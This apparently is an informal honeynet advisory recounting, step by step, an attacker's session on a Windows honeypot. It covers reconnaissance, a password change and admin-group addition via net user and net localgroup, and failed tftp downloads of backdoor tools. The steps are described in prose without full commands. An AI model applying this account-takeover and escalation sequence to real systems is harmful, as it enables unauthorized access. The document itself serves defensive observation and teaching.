At around 3:57 PM, we noticed some strange activtiy picked up in our honeynet logs. After a bit of investigation, we noted that an attacker was snooping around one of our honeypots.

In this version of our "advisory", I will show you a sample of the activity that we've picked up. Here is a step by step walkthrough of the start of the attack session:

Step 1: Our attacker begins his activities by opening up a command shell.

Step 2: Our attacker next issues the "ipconfig" command, an obvious starting point.

Step 3: Attacker issues a net user command. The net user command creates and/or modifies user accounts on computers. Attacker tries to change the "TsInternetUser" account password. The attacker is successful. He or she now "owns" an account in the honeypot.

Step 4: Attacker issues another net user command, this time to deactivite the "guest" user account.

Step 5: Attacker issues a net localgroup command. The net localgroup command modifies local groups in the computer. In this case, he adds the "TsInternetUser" into the administrator group. The command is successful. The attacker has now escalated his/her priveledges.

Step 6: Attacker uses tftp to download a file called mt.exe from a remote server. Attacker is unsuccessful. Further research indicates "mt.exe" as a backdoor tool. It probably overwrites the original Windows mt.exe backup utility.

Step 7: Attacker tries to issue a command to "mt.exe" with a "-findpass" parameter. I'm not sure what the command does since I could only presume that this is somehow related to system passwords though unlikely since the attacker has administrator access already. It is most likely a command to search and steal stored passwords in files and documents in the system. Obviously, this command is unsuccessful since the "mt.ext" download was unsuccessful.

Step 8: Attacker runs the same command with the "-chkts" parameter followed closely by the "-setupts" parameter. Both commands failed for obvious reasons. I have yet to investigate the said backdoor tool.

Step 9 and Step 10: Attacker this time tries to download and run a file called "s_up_rar.exe". Unfortunately it failed and I wasn't able to obtain a sample of it. A search in google didn't turn up anything too.

Step 11 : It is strange that the attacker issued an "echo off" command followed by yet another attempt to run the "s_up_rar.exe" file that had failed to download. I am beginning to suspect that this may be an automated attempt. The attacker then ran an "echo on" command.

Step 12 and Step 13: The attacker tries to download and run a file called "acsmic.exe". Yet another failed attempt so no samples were caught. A search in google did not turn up anything about the file.

Step 14: The attacker tries to create a file in the honeypot called "s.vsb". The actual code is provided in the packet capture. I have yet to analyze the code or have any plans to but any volunteers would be great.

Step 15 and Step 16 and Step 17: The attacker tries to run the "s.vbs" script through cscript, the Windows scripting host. Step 16 is similar to Step 14 and Step 17 is similar to Step 15. Possibly the attacker might have made a mistake in the first one and is attempting creating and running the file again. Unfortuantely, after this, we lost the attacker either by his own initiative or our own fault.

As you've seen here, this is the typical attacker behavior. It is important to highlight that the first thing attackers usually do is begin with a surface recon of the system, proceed to create or acquire an account, then proceed to raise their priveledge afterwhich they will install a backdoor into the system. Once the backdoor is installed, the attacker leaves with a satisfied thought that he or she has "owned" the computer.